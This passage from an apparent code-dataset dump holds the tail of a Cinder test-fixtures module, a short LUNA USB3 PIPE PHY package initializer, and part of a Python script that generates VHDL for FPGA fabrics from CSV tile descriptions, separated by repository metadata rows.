you may well end up accidentally running the privsep rootwrap
helper. This will fail in the gate, but it fails in a way which
doesn't identify which test is missing a mock. Instead, we
raise an exception so that you at least know where you've missed
something.
"""
def setUp(self):
super(PrivsepNoHelperFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_privsep.daemon.RootwrapClientChannel',
UnHelperfulClientChannel))
class PolicyFixture(fixtures.Fixture):
"""Load the live policy for tests.
A base policy fixture that starts with the assumption that you'd
like to load and enforce the shipped default policy in tests.
"""
def setUp(self):
super().setUp()
cinder.policy.reset()
# Suppress deprecation warnings for unit tests.
cinder.policy.init(suppress_deprecation_warnings=True)
self.addCleanup(cinder.policy.reset)
def set_rules(self, rules, overwrite=True):
policy = cinder.policy._ENFORCER
policy.set_rules(oslo_policy.Rules.from_dict(rules),
overwrite=overwrite)
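# Illustrative usage sketch (not part of the original module); assumes a test case
# that supports fixtures via useFixture (e.g. testtools/oslotest), and the policy
# rule name shown is only an example:
#
#   self.useFixture(StandardLogging())
#   policy = self.useFixture(PolicyFixture())
#   policy.set_rules({"volume:create": "!"}, overwrite=False)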
| 35.860215 | 79 | 0.68006 |
4a1f48db441b71b50c50da329db7d935ba10476d | 503 | py | Python | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | #
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <[email protected]>
# Copyright (c) 2020 Florent Kermarrec <[email protected]>
#
# Code adapted from ``litex`` and ``usb3_pipe``.
# SPDX-License-Identifier: BSD-3-Clause
""" SerDes-based USB3 PIPE PHY. """
#
# Quick-use aliases
#
__all__ = ['ECP5SerDesPIPE', 'XC7GTPSerDesPIPE', 'XC7GTXSerDesPIPE']
from .ecp5 import ECP5SerDesPIPE
from .xc7_gtp import XC7GTPSerDesPIPE
from .xc7_gtx import XC7GTXSerDesPIPE
| 26.473684 | 69 | 0.741551 |
4a1f498f8e228ba4d301b9865fcc19076299891c | 236,438 | py | Python | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | 5 | 2020-12-25T00:43:15.000Z | 2021-02-01T17:45:35.000Z | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | 1 | 2020-12-25T00:43:08.000Z | 2020-12-25T00:43:08.000Z | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python3
# Copyright 2021 University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from array import array
import re
import sys
from contextlib import redirect_stdout
from io import StringIO
import math
import os
import numpy
import configparser
import pickle
import csv
from fasm import * #Remove this line if you do not have the fasm library installed and will not be generating a bitstream
# Default parameters (will be overwritten if defined in the fabric file between 'ParametersBegin' and 'ParametersEnd')
#Parameters = [ 'ConfigBitMode', 'FrameBitsPerRow' ]
ConfigBitMode = 'FlipFlopChain'
FrameBitsPerRow = 32
MaxFramesPerCol = 20
Package = 'use work.my_package.all;'
GenerateDelayInSwitchMatrix = '100' # time in ps - this is needed for simulation as a fabric configuration can result in loops crashing the simulator
MultiplexerStyle = 'custom' # 'custom': using our hard-coded MUX-4 and MUX-16; 'generic': using standard generic RTL code
SwitchMatrixDebugSignals = True # generate switch matrix select signals (index) which is useful to verify that the generated bitstream matches the intended configuration
# TILE field aliases
direction = 0
source_name = 1
X_offset = 2
Y_offset = 3
destination_name = 4
wires = 5
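# Illustrative example (added comment): a routing line from the fabric CSV such as
#   ['NORTH', 'N1BEG', '0', '1', 'N1END', '4']
# is accessed as line[direction]=='NORTH', line[source_name]=='N1BEG',
# line[X_offset]=='0', line[Y_offset]=='1', line[destination_name]=='N1END' and
# line[wires]=='4' (values are read from the CSV as strings).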
# bitstream mapping aliases
frame_name = 0
frame_index = 1
bits_used_in_frame = 2
used_bits_mask = 3
ConfigBits_ranges = 4
# columns where VHDL file is specified
VHDL_file_position=1
TileType_position=1
# BEL prefix field (needed to allow multiple instantiations of the same BEL inside the same tile)
BEL_prefix=2
# MISC
All_Directions = ['NORTH', 'EAST', 'SOUTH', 'WEST']
# Given a fabric array description, return all uniq cell types
def GetCellTypes( list ):
# make the fabric flat
flat_list = []
for sublist in list:
for item in sublist:
flat_list.append(item)
output = []
for item in flat_list:
if item not in output:
output.append(item)
# we use the keyword 'NULL' for padding tiles that we don't return
if ('NULL' in output):
output.remove('NULL')
return output;
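# Illustrative sketch (not in the original source):
#   GetCellTypes([['N_term', 'N_term'], ['CLB', 'NULL']])  ->  ['N_term', 'CLB']
# i.e. duplicates are dropped and the 'NULL' padding keyword is filtered out.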
# take a list and remove all items that contain a # and remove empty lines
def RemoveComments( list ):
output = []
for line in list:
templine = []
marker = False # we use this marker to remember if we had an '#' element before
for item in line:
if item.startswith('#'):
marker = True
if not (item.startswith('#') or marker == True):
# marker = True
templine.append(item)
if item == '':
templine.remove('')
if templine != []:
output.append(templine)
return output;
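# Illustrative sketch (not in the original source):
#   RemoveComments([['CLB', '#comment', 'ignored'], ['']])  ->  [['CLB']]
# everything from the first '#' item onwards is dropped and empty lines disappear.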
def GetFabric( list, filter = 'Fabric' ):
templist = []
# output = []
marker = False
for sublist in list:
if filter+'End' in sublist: # was FabricEnd
marker = False
if marker == True:
templist.append(sublist)
# we place this conditional after the append such that the 'FabricBegin' will be kicked out
if filter+'Begin' in sublist: # was FabricBegin
marker = True
return RemoveComments(templist)
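# Illustrative sketch (not in the original source): only the rows strictly between
# the '<filter>Begin' and '<filter>End' markers are returned, with comments removed:
#   GetFabric([['FabricBegin'], ['CLB', 'CLB'], ['FabricEnd']])  ->  [['CLB', 'CLB']]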
def GetTileFromFile( list, TileType ):
templist = []
# output = []
marker = False
for sublist in list:
if ('EndTILE' in sublist):
marker = False
if ('TILE' in sublist) and (TileType in sublist):
marker = True
if marker == True:
templist.append(sublist)
# we place this conditional after the append such that the 'FabricBegin' will be kicked out
# if ('TILE' in sublist) and (type in sublist):
# if ('TILE' in sublist) and (TileType in sublist):
# marker = True
return RemoveComments(templist)
def PrintTileComponentPort (tile_description, entity, direction, file ):
print('\t-- ',direction, file=file)
for line in tile_description:
if line[0] == direction:
print('\t\t',line[source_name], '\t: out \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires: ', line[wires], file=file)
for line in tile_description:
if line[0] == direction:
print('\t\t',line[destination_name], '\t: in \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires: ', line[wires], file=file)
return
def replace(string, substitutions):
substrings = sorted(substitutions, key=len, reverse=True)
regex = re.compile('|'.join(map(re.escape, substrings)))
return regex.sub(lambda match: substitutions[match.group(0)], string)
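# Illustrative sketch (not in the original source): the substitution keys are treated
# as literal substrings (they are re.escape'd) and applied longest-key-first, e.g.
#   replace('A0:in;', {':in': '', ';': ''})  ->  'A0'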
def PrintComponentDeclarationForFile(VHDL_file_name, file ):
ConfigPortUsed = 0 # 1 means is used
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
templist = []
marker = False
# for item in VHDLfile:
# print(item)
for line in VHDLfile:
# NumberOfConfigBits:0 means no configuration port
if re.search('NumberOfConfigBits', line, flags=re.IGNORECASE):
# NumberOfConfigBits appears, so we may have a config port
ConfigPortUsed = 1
# but only if the following is not true
if re.search('NumberOfConfigBits:0', line, flags=re.IGNORECASE):
ConfigPortUsed = 0
if marker == True:
print(re.sub('entity', 'component', line, flags=re.IGNORECASE), file=file)
if re.search('^entity', line, flags=re.IGNORECASE):
# print(str.replace('^entity', line))
# re.sub('\$noun\$', 'the heck', 'What $noun$ is $verb$?')
print(re.sub('entity', 'component', line, flags=re.IGNORECASE), file=file)
marker = True
if re.search('^end ', line, flags=re.IGNORECASE):
marker = False
print('', file=file)
return ConfigPortUsed
def GetComponentPortsFromFile( VHDL_file_name, filter = 'ALL', port = 'internal', BEL_Prefix = '' ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
Inputs = []
Outputs = []
ExternalPorts = []
marker = False
FoundEntityMarker = False
DoneMarker = False
direction = ''
for line in VHDLfile:
        # the order of the if-statements is important
if re.search('^entity', line, flags=re.IGNORECASE):
FoundEntityMarker = True
# detect the direction from comments, like "--NORTH"
# we need this to filter for a specific direction
# this implies of course that this information is provided in the VHDL entity
if re.search('NORTH', line, flags=re.IGNORECASE):
direction = 'NORTH'
if re.search('EAST', line, flags=re.IGNORECASE):
direction = 'EAST'
if re.search('SOUTH', line, flags=re.IGNORECASE):
direction = 'SOUTH'
if re.search('WEST', line, flags=re.IGNORECASE):
direction = 'WEST'
# all primitive pins that are connected to the switch matrix have to go before the GLOBAL label
if re.search('-- global', line, flags=re.IGNORECASE):
FoundEntityMarker = False
marker = False
DoneMarker = True
if (marker == True) and (DoneMarker == False) and (direction == filter or filter == 'ALL') :
# detect if the port has to be exported as EXTERNAL which is flagged by the comment
if re.search('EXTERNAL', line):
External = True
else:
External = False
if re.search('CONFIG_PORT', line):
Config = True
else:
Config = False
# get rid of everything with and after the ';' that will also remove comments
# substitutions = {';.*', '', '--.*', '', ',.*', ''}
# tmp_line=(replace(line, substitutions))
# tmp_line = (re.sub(';.*', '',(re.sub('--.*', '',line, flags=re.IGNORECASE)), flags=re.IGNORECASE))
tmp_line = (re.sub(';.*', '',(re.sub('--.*', '',(re.sub(',.*', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE)), flags=re.IGNORECASE))
std_vector = ''
if re.search('std_logic_vector', tmp_line, flags=re.IGNORECASE):
std_vector = (re.sub('.*std_logic_vector', '', tmp_line, flags=re.IGNORECASE))
tmp_line = (re.sub('STD_LOGIC.*', '', tmp_line, flags=re.IGNORECASE))
substitutions = {" ": "", "\t": ""}
tmp_line=(replace(tmp_line, substitutions))
# at this point, we get clean port names, like
# A0:in
# A1:in
# A2:in
# The following is for internal fabric signal ports (e.g., a CLB/LUT)
if (port == 'internal') and (External == False) and (Config == False):
if re.search(':in', tmp_line, flags=re.IGNORECASE):
Inputs.append(BEL_Prefix+(re.sub(':in.*', '', tmp_line, flags=re.IGNORECASE))+std_vector)
if re.search(':out', tmp_line, flags=re.IGNORECASE):
Outputs.append(BEL_Prefix+(re.sub(':out.*', '', tmp_line, flags=re.IGNORECASE))+std_vector)
# The following is for ports that have to go all the way up to the top-level entity (e.g., from an I/O cell)
if (port == 'external') and (External == True):
# .lstrip() removes leading white spaces including ' ', '\t'
ExternalPorts.append(BEL_Prefix+line.lstrip())
# frame reconfiguration needs a port for writing in frame data
if (port == 'frame_config') and (Config == True):
# .lstrip() removes leading white spaces including ' ', '\t'
ExternalPorts.append(BEL_Prefix+line.lstrip())
if re.search('port', line, flags=re.IGNORECASE):
marker = True
if port == 'internal': # default
return Inputs, Outputs
else:
return ExternalPorts
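# Summary (added comment): with the default port='internal' this returns
# ([inputs], [outputs]) for all ports declared before the '-- global' marker, each
# name prefixed with BEL_Prefix plus any std_logic_vector range; for a hypothetical
# LUT entity with ports A0..A3 : in and O : out it would return
# (['A0', 'A1', 'A2', 'A3'], ['O']). With port='external' or 'frame_config' it instead
# returns the raw declaration lines flagged by the EXTERNAL / CONFIG_PORT comments.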
def GetNoConfigBitsFromFile( VHDL_file_name ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
result='NULL'
for line in VHDLfile:
# the order of the if-statements is important
# if re.search('Generic', line, flags=re.IGNORECASE) and re.search('NoConfigBits', line, flags=re.IGNORECASE):
if re.search('integer', line, flags=re.IGNORECASE) and re.search('NoConfigBits', line, flags=re.IGNORECASE):
result = (re.sub(' ','', (re.sub('\).*', '', (re.sub('.*=', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE))))
return result
def GetComponentEntityNameFromFile( VHDL_file_name ):
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
for line in VHDLfile:
# the order of the if-statements is important
if re.search('^entity', line, flags=re.IGNORECASE):
result = (re.sub(' ','', (re.sub('entity', '', (re.sub(' is.*', '', line, flags=re.IGNORECASE)), flags=re.IGNORECASE))))
return result
def BootstrapSwitchMatrix( tile_description, TileType, filename ):
Inputs = []
Outputs = []
result = []
    # get the >>tile ports<< that connect to the outside world (these are from the NORTH EAST SOUTH WEST entries from the csv file section)
# 'N1END0', 'N1END1' ... 'N1BEG0', 'N1BEG1', 'N1BEG2', 'N2BEG0',
# will only be WIRES ports as the rest is eventually used for cascading
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrix')
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrix')
    # get all >>BEL ports<< as defined by the BELs from the VHDL files
for line in tile_description:
if line[0] == 'BEL':
tmp_Inputs = []
tmp_Outputs = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
tmp_Inputs, tmp_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
# print('tmp_Inputs Inputs',tmp_Inputs)
# IMPORTANT: the outputs of a BEL are the inputs to the switch matrix!
Inputs = Inputs + tmp_Outputs
# print('next Inputs',Inputs)
# Outputs.append(tmp_Outputs)
# IMPORTANT: the inputs to a BEL are the outputs of the switch matrix!
Outputs = Outputs + tmp_Inputs
    # get all >>JUMP ports<< (stop over ports that are input and output and that stay in the tile) as defined by the JUMP entries in the CSV file
for line in tile_description:
if line[0] == 'JUMP':
# tmp_Inputs = []
# tmp_Outputs = []
for k in range(int(line[wires])):
# the NULL check in the following allows us to have just source ports, such as GND or VCC
if line[destination_name] != 'NULL':
Inputs.append(str(line[destination_name])+str(k))
if line[source_name] != 'NULL':
Outputs.append(str(line[source_name])+str(k))
# generate the matrix
NumberOfInputs=len(Inputs)
NumberOfOutputs=len(Outputs)
# initialize with 0
for output in range(NumberOfOutputs+1):
one_line = []
for input in range(NumberOfInputs+1):
# one_line.append(str(output)+'_'+str(input))
one_line.append(str(0))
result.append(one_line)
# annotate input and output names
result[0][0] = TileType
for k in range(0,NumberOfOutputs):
result[k+1][0] = Outputs[k]
for k in range(0,NumberOfInputs):
result[0][k+1] = Inputs[k]
# result CLB, N1END0, N1END1, N1END2, ...
# result N1BEG0, 0, 0, 0, ...
# result N1BEG1, 0, 0, 0, ...
# I found something that writes the csv file
# import numpy
# tmp = array.zeros((NumberOfInputs+1,NumberOfOutputs+1)) #np.zeros(20).reshape(NumberOfInputs,NumberOfOutputs)
# array = np.array([(1,2,3), (4,5,6)])
tmp = numpy.asarray(result)
if filename != '':
numpy.savetxt(filename, tmp, fmt='%s', delimiter=",")
return Inputs, Outputs
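# Note (added comment): the PrintTileComponentPort definition below supersedes the
# earlier function of the same name defined near the top of this file; Python keeps
# only the latest definition, so this more verbose variant is the one actually used.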
def PrintTileComponentPort (tile_description, entity, direction, file ):
print('\t-- ',direction, file=file)
for line in tile_description:
if line[0] == direction:
if line[source_name] != 'NULL':
print('\t\t',line[source_name], '\t: out \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
for line in tile_description:
if line[0] == direction:
if line[destination_name] != 'NULL':
print('\t\t',line[destination_name], '\t: in \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires:'+line[wires], end=' ', file=file)
print('X_offset:'+line[X_offset], 'Y_offset:'+line[Y_offset], ' ', end='', file=file)
print('source_name:'+line[source_name], 'destination_name:'+line[destination_name], ' \n', end='', file=file)
return
def GetTileComponentPorts( tile_description, mode='SwitchMatrix'):
Inputs = []
Outputs = []
OpenIndex = ''
CloseIndex = ''
if re.search('Indexed', mode, flags=re.IGNORECASE):
OpenIndex = '('
CloseIndex = ')'
for line in tile_description:
if (line[direction] == 'NORTH') or (line[direction] == 'EAST') or (line[direction] == 'SOUTH') or (line[direction] == 'WEST'):
# range (wires-1 downto 0) as connected to the switch matrix
if mode in ['SwitchMatrix','SwitchMatrixIndexed']:
ThisRange = int(line[wires])
if mode in ['AutoSwitchMatrix','AutoSwitchMatrixIndexed']:
if line[source_name] == 'NULL' or line[destination_name] == 'NULL':
# the following line connects all wires to the switch matrix in the case one port is NULL (typically termination)
ThisRange = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
else:
# the following line connects all bottom wires to the switch matrix in the case begin and end ports are used
ThisRange = int(line[wires])
# range ((wires*distance)-1 downto 0) as connected to the tile top
if mode in ['all','allIndexed','Top','TopIndexed','AutoTop','AutoTopIndexed']:
ThisRange = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
# the following three lines are needed to get the top line[wires] that are actually the connection from a switch matrix to the routing fabric
StartIndex = 0
if mode in ['Top','TopIndexed']:
StartIndex = ((abs(int(line[X_offset]))+abs(int(line[Y_offset])))-1) * int(line[wires])
if mode in ['AutoTop','AutoTopIndexed']:
if line[source_name] == 'NULL' or line[destination_name] == 'NULL':
                    # in case one port is NULL, then all the other port wires get connected to the switch matrix.
StartIndex = 0
else:
# "normal" case as for the CLBs
StartIndex = ((abs(int(line[X_offset]))+abs(int(line[Y_offset])))-1) * int(line[wires])
for i in range(StartIndex, ThisRange):
if line[destination_name] != 'NULL':
Inputs.append(line[destination_name]+OpenIndex+str(i)+CloseIndex)
if line[source_name] != 'NULL':
Outputs.append(line[source_name]+OpenIndex+str(i)+CloseIndex)
return Inputs, Outputs
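# Illustrative sketch (not in the original source): for a CSV line
# ['NORTH', 'N2BEG', '0', '2', 'N2END', '4'] with both begin and end ports present,
#   mode='SwitchMatrix' yields Inputs N2END0..N2END3 and Outputs N2BEG0..N2BEG3,
#   mode='Top'          yields the far-end segment N2END4..N2END7 / N2BEG4..N2BEG7,
# and the '...Indexed' variants emit the index in parentheses, e.g. 'N2END(3)'.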
def GetTileComponentPortsVectors( tile_description, mode ):
Inputs = []
Outputs = []
MaxIndex = 0
for line in tile_description:
if (line[direction] == 'NORTH') or (line[direction] == 'EAST') or (line[direction] == 'SOUTH') or (line[direction] == 'WEST'):
# range (wires-1 downto 0) as connected to the switch matrix
if mode in ['SwitchMatrix','SwitchMatrixIndexed']:
MaxIndex = int(line[wires])
# range ((wires*distance)-1 downto 0) as connected to the tile top
if mode in ['all','allIndexed']:
MaxIndex = (abs(int(line[X_offset]))+abs(int(line[Y_offset]))) * int(line[wires])
if line[destination_name] != 'NULL':
Inputs.append(str(line[destination_name]+'('+str(MaxIndex)+' downto 0)'))
if line[source_name] != 'NULL':
Outputs.append(str(line[source_name]+'('+str(MaxIndex)+' downto 0)'))
return Inputs, Outputs
def GenerateVHDL_Header( file, entity, package='' , NoConfigBits='0', MaxFramesPerCol='NULL', FrameBitsPerRow='NULL'):
# library template
print('library IEEE;', file=file)
print('use IEEE.STD_LOGIC_1164.ALL;', file=file)
print('use IEEE.NUMERIC_STD.ALL;', file=file)
if package != '':
print(package, file=file)
print('', file=file)
# entity
print('entity ',entity,' is ', file=file)
print('\tGeneric ( ', file=file)
if MaxFramesPerCol != 'NULL':
print('\t\t\t MaxFramesPerCol : integer := '+MaxFramesPerCol+';', file=file)
if FrameBitsPerRow != 'NULL':
print('\t\t\t FrameBitsPerRow : integer := '+FrameBitsPerRow+';', file=file)
print('\t\t\t NoConfigBits : integer := '+NoConfigBits+' );', file=file)
print('\tPort (', file=file)
return
def GenerateVHDL_EntityFooter ( file, entity, ConfigPort=True , NumberOfConfigBits = ''):
if ConfigPort==False:
# stupid VHDL doesn't allow us to finish the last port signal declaration with a ';',
# so we pragmatically delete that if we have no config port
        # TODO - move this into a function, but only if we have a regression suite in place
file.seek(0) # seek to beginning of the file
last_pos = 0 # we use this variable to find the position of last ';'
while True:
my_char = file.read(1)
if not my_char:
break
else:
if my_char == ';': # scan character by character and look for ';'
last_pos = file.tell()
file.seek(last_pos-1) # place seek pointer to last ';' position and overwrite with a space
print(' ', end='', file=file)
file.seek(0, os.SEEK_END) # go back to usual...
# file.seek(interupt_pos)
# file.seek(0, os.SEEK_END) # seek to end of file; f.seek(0, 2) is legal
# file.seek(file.tell() - 3, os.SEEK_SET) # go backwards 3 bytes
# file.truncate()
print('', file=file)
print('\t-- global', file=file)
if ConfigPort==True:
if ConfigBitMode == 'FlipFlopChain':
print('\t\t MODE\t: in \t STD_LOGIC;\t -- global signal 1: configuration, 0: operation', file=file)
print('\t\t CONFin\t: in \t STD_LOGIC;', file=file)
print('\t\t CONFout\t: out \t STD_LOGIC;', file=file)
print('\t\t CLK\t: in \t STD_LOGIC', file=file)
if ConfigBitMode == 'frame_based':
print('\t\t ConfigBits : in \t STD_LOGIC_VECTOR( NoConfigBits -1 downto 0 )', file=file)
print('\t);', file=file)
print('end entity',entity,';', file=file)
print('', file=file)
# architecture
print('architecture Behavioral of ',entity,' is ', file=file)
print('', file=file)
return
def GenerateVHDL_Conf_Instantiation ( file, counter, close=True ):
print('\t -- GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
print('\t\t MODE => Mode, ', file=file)
print('\t\t CONFin => conf_data('+str(counter)+'), ', file=file)
print('\t\t CONFout => conf_data('+str(counter+1)+'), ', file=file)
if close==True:
print('\t\t CLK => CLK ); \n', file=file)
else:
print('\t\t CLK => CLK ', file=file)
return
def GenerateTileVHDL( tile_description, entity, file ):
MatrixInputs = []
MatrixOutputs = []
TileInputs = []
TileOutputs = []
BEL_Inputs = []
BEL_Outputs = []
AllJumpWireList = []
NuberOfSwitchMatricesWithConfigPort = 0
# We first check if we need a configuration port
# Currently we assume that each primitive needs a configuration port
# However, a switch matrix can have no switch matrix multiplexers
# (e.g., when only bouncing back in border termination tiles)
# we can detect this as each switch matrix file contains a comment -- NumberOfConfigBits
# NumberOfConfigBits:0 tells us that the switch matrix does not have a config port
    # TODO: we don't do this and always create a configuration port for each tile. This may dangle the CLK and MODE ports hanging in the air, which will throw a warning
TileTypeMarker = False
for line in tile_description:
if line[0] == 'TILE':
TileType = line[TileType_position]
TileTypeMarker = True
if TileTypeMarker == False:
raise ValueError('Could not find tile type in function GenerateTileVHDL')
# the VHDL initial header generation is shared until the Port
# in order to use GenerateVHDL_Header, we have to count the number of configuration bits by scanning all files for the "Generic ( NoConfigBits...
GlobalConfigBitsCounter = 0
if ConfigBitMode == 'frame_based':
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# GenerateVHDL_Header(file, entity, NoConfigBits=str(GlobalConfigBitsCounter))
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
PrintTileComponentPort (tile_description, entity, 'NORTH', file)
PrintTileComponentPort (tile_description, entity, 'EAST', file)
PrintTileComponentPort (tile_description, entity, 'SOUTH', file)
PrintTileComponentPort (tile_description, entity, 'WEST', file)
# now we have to scan all BELs if they use external pins, because they have to be exported to the tile entity
ExternalPorts = []
for line in tile_description:
if line[0] == 'BEL':
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
ExternalPorts = ExternalPorts + (GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix = BEL_prefix_string+'BEL_prefix_string_marker'))
# if we found BELs with top-level IO ports, we just pass them through
SharedExternalPorts = []
if ExternalPorts != []:
print('\t-- Tile IO ports from BELs', file=file)
for item in ExternalPorts:
            # if a port is flagged with the 'SHARED_PORT' comment, we declare that port only once
# we use the string 'BEL_prefix_string_marker' to separate the port name from the prefix
if re.search('SHARED_PORT', item):
# we firstly get the plain port name without comments, whitespaces, etc.
# we place that in the SharedExternalPorts list to check if that port was declared earlier
shared_port = re.sub(':.*', '',re.sub('.*BEL_prefix_string_marker', '', item)).strip()
if shared_port not in SharedExternalPorts:
print('\t\t',re.sub('.*BEL_prefix_string_marker', '', item), file=file)
SharedExternalPorts.append(shared_port)
else:
print('\t\t',re.sub('BEL_prefix_string_marker', '', item), file=file)
# the rest is a shared text block
if ConfigBitMode == 'frame_based':
if GlobalConfigBitsCounter > 0:
print('\t\t FrameData: in STD_LOGIC_VECTOR( FrameBitsPerRow -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( MaxFramesPerCol -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
else:
GenerateVHDL_EntityFooter(file, entity)
# insert CLB, I/O (or whatever BEL) component declaration
# specified in the fabric csv file after the 'BEL' key word
BEL_VHDL_riles_processed = [] # we use this list to check if we have seen a BEL description before so we only insert one component declaration
for line in tile_description:
if line[0] == 'BEL':
Inputs = []
Outputs = []
if line[VHDL_file_position] not in BEL_VHDL_riles_processed:
PrintComponentDeclarationForFile(line[VHDL_file_position], file)
BEL_VHDL_riles_processed.append(line[VHDL_file_position])
# we need the BEL ports (a little later) so we take them on the way
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
Inputs, Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
BEL_Inputs = BEL_Inputs + Inputs
BEL_Outputs = BEL_Outputs + Outputs
print('', file=file)
# insert switch matrix component declaration
# specified in the fabric csv file after the 'MATRIX' key word
MatrixMarker = False
for line in tile_description:
if line[0] == 'MATRIX':
if MatrixMarker == True:
                raise ValueError('More than one switch matrix defined for tile '+TileType+'; exiting GenerateTileVHDL')
NuberOfSwitchMatricesWithConfigPort = NuberOfSwitchMatricesWithConfigPort + PrintComponentDeclarationForFile(line[VHDL_file_position], file)
# we need the switch matrix ports (a little later)
MatrixInputs, MatrixOutputs = GetComponentPortsFromFile(line[VHDL_file_position])
MatrixMarker = True
print('', file=file)
if MatrixMarker == False:
        raise ValueError('Could not find switch matrix definition for tile type '+TileType+' in function GenerateTileVHDL')
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
PrintComponentDeclarationForFile(entity+'_ConfigMem.vhdl', file)
# VHDL signal declarations
print('-- signal declarations'+'\n', file=file)
# BEL port wires
print('-- BEL ports (e.g., slices)', file=file)
for port in (BEL_Inputs + BEL_Outputs):
print('signal\t'+port+'\t:STD_LOGIC;', file=file)
# Jump wires
print('-- jump wires', file=file)
for line in tile_description:
if line[0] == 'JUMP':
if (line[source_name] == '') or (line[destination_name] == ''):
raise ValueError('Either source or destination port for JUMP wire missing in function GenerateTileVHDL')
            # we don't add ports or a corresponding signal name, if we have a NULL driver (which we use as an exception for GND and VCC (VCC0 GND0))
if not re.search('NULL', line[source_name], flags=re.IGNORECASE):
print('signal\t',line[source_name], '\t:\tSTD_LOGIC_VECTOR('+str(line[wires])+' downto 0);', file=file)
# we need the jump wires for the switch matrix component instantiation..
for k in range(int(line[wires])):
AllJumpWireList.append(str(line[source_name]+'('+str(k)+')'))
# internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)
print('-- internal configuration data signal to daisy-chain all BELs (if any and in the order they are listed in the fabric.csv)', file=file)
# the signal has to be number of BELs+2 bits wide (Bel_counter+1 downto 0)
BEL_counter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_counter += 1
# we chain switch matrices only to the configuration port, if they really contain configuration bits
# i.e. switch matrices have a config port which is indicated by "NumberOfConfigBits:0 is false"
    # The following conditional was intended to only generate the config_data signal if anything is actually configured;
    # however, we leave it and just use this signal as conf_data(0 downto 0) for simply routing through CONFin to CONFout
# maybe even useful if we want to add a buffer here
# if (Bel_Counter + NuberOfSwitchMatricesWithConfigPort) > 0
